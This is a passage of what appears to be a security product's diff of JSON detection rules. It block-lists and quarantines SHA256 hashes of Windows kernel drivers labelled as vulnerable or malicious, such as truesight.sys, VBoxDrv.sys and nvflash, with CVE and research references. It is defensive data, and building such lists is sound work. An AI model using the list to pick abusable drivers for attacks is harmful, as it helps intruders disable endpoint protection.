AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db7b3483-547d-5417-86d9-30d67d0842f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817178Z", + "creation_date": "2026-03-23T11:45:30.817181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ace6dded819e87f3686af2006cb415ed75554881a28c54de606975c41975112", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db821369-2e81-5909-a5bc-ce14b30d45d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825422Z", + "creation_date": "2026-03-23T11:45:30.825426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825435Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81aac371b0fb635ed36b7c83c5ce52ef3587f92bfc2b98d6641fa2efae2fe782", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db931d4b-3d06-51ec-87d3-2c08eed5b947", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618040Z", + "creation_date": "2026-03-23T11:45:29.618042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4710acca9c4a61e2fc6daafb09d72e11b603ef8cd732e12a84274ea9ad6d43be", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db95c4c6-9a4e-5fe3-b08b-580bbf1f0f51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608369Z", + "creation_date": "2026-03-23T11:45:29.608371Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608376Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b24bd295ebe05f54c8efc353be1ac6cf2c07cf4036ef0756e8296129a8e7a63a", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "db9d1dba-5bf3-582c-8681-38c79f2131b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836541Z", + "creation_date": "2026-03-23T11:45:30.836543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0da33f5906af0bdfe630561ee62ae7a6d882f5a9811ba2638fa84adeadfb7160", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dba433f4-ce45-56f8-92c1-cdc06ee05ecd", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493791Z", + "creation_date": "2026-03-23T11:45:31.493795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493804Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbebacae253be6dea626ad354061b14a2da0d3c4ef6c9f31b29c7a0128f863ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dba785c4-eb61-5d4c-b720-70adb6cac2bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978049Z", + "creation_date": "2026-03-23T11:45:29.978051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978056Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2", + "comment": "Vulnerable Kernel Driver (aka ni.sys) [https://www.loldrivers.io/drivers/4f93e19c-4600-4e2e-943f-a986875fd7d2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbb4e149-6270-5906-b001-ae376909d137", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475358Z", + "creation_date": "2026-03-23T11:45:30.475362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3fb37ecca8742677bd94ef6f6fb195b4baac701525c2140773a6475fa3aa633c", + "comment": "Malicious Kernel Driver (aka ef0e1725aaf0c6c972593f860531a2ea.sys) [https://www.loldrivers.io/drivers/8c2df58f-1e02-4911-ad40-3fa4ed1f4333/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbbd8cca-b1c7-598d-9f84-186ce5806b07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979203Z", + "creation_date": "2026-03-23T11:45:29.979205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a6db5febdaf3f1577bf97c6e1e24913e6c78b134062c02fd1f9875099c03a3f", + "comment": "Vulnerable Kernel Driver (aka nt2.sys) [https://www.loldrivers.io/drivers/cacc48e6-6ed8-431c-abee-88ee6c2dc3c1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbc0d456-803a-59c2-8e8e-cbc15f4b6267", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484330Z", + "creation_date": "2026-03-23T11:45:31.484333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86e323a7bfb49e25d7b87b9371bae05b55eee961f7601057bd4f3678334b4bb5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbc1d65a-8a81-5995-8594-4009c1ae2d90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620177Z", + "creation_date": "2026-03-23T11:45:29.620179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620184Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbc37f56-f37f-59cb-950a-e7abdfdec53f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146204Z", + 
"creation_date": "2026-03-23T11:45:31.146206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "175bfda05e5038f18daf8df0ace486fcad16d6e6412499e71db6e822ab2ea785", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbc8516f-5048-5b3e-b974-b39568bf298c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478379Z", + "creation_date": "2026-03-23T11:45:31.478400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0cd6340e6726716c7f1c000e7b63fd8bca7e74102eb91edddcb4428bc1dd55b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbd92e0f-8455-5320-a172-9c5fb1ba5840", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150772Z", + "creation_date": "2026-03-23T11:45:31.150774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "698a74f3c3261d42ba900e1cb213036ec41164faffc39bc9de996243d86f0c33", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbe6cea0-9b79-59e0-9603-9697a7af59e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614839Z", + "creation_date": "2026-03-23T11:45:29.614841Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614846Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbf1ebe6-8ea0-579c-abd4-8871b12abe54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977442Z", + "creation_date": "2026-03-23T11:45:29.977445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe", + "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dbf2ab8a-aaf1-5151-8abc-ec5f2f6b6039", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608742Z", + "creation_date": "2026-03-23T11:45:29.608744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfad0d75d218ce160f7b7932e39ec4387d2245c3d72eb9d7cfbaa5198aa8cee3", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc08399e-6e47-53de-8329-8afd6fe89621", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813297Z", + "creation_date": "2026-03-23T11:45:31.813300Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "f749a9da70a5b74835bde3210e7388ab8a569dcd73b8d2377569348cd592f8d9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc2b05a5-453d-5be7-a332-f8f54b5ce3ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829359Z", + "creation_date": "2026-03-23T11:45:31.829362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89fbb4aff9cb0636ff3b732dcc7ce7972337b649212214c72d1172574e30c23e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc2d5b44-3608-5aec-b5f0-7d30ade9837c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824276Z", + "creation_date": "2026-03-23T11:45:30.824278Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db0c85649cbf52afdb65c3d5c69357eb24c202ca1de35dc3dad7d75690823a5f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc3d9437-4ffd-5383-8ff2-c194a175377b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476404Z", + "creation_date": "2026-03-23T11:45:31.476408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc5fa01c9a3885cbc0e6f4a798f487fbe77aa6c83770c0558f7f72fea7e46b35", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc41c0c0-67a2-58ad-b54c-1b59f92c3398", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821962Z", + "creation_date": "2026-03-23T11:45:30.821964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821970Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db58973c75b7cb94ffb31ad46fddf2f16f19075a99a69a7de20f8c0e42d96ba0", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc427c68-8bd9-5d1f-8d4c-6bf8558bf02d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.827980Z", + "creation_date": "2026-03-23T11:45:31.827983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827988Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a996a4b5d494f02a2e70a3cffe28f4ee9d5de7cf48f5363b662163165f4d31e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dc541a5e-a9e1-5f0d-8133-37ea1b045d26", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618907Z", + "creation_date": "2026-03-23T11:45:29.618909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618915Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c349c8036b5ee61e7b0831943697ba98bfe70a52bac0a06b497c229b0c0fff27", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] 
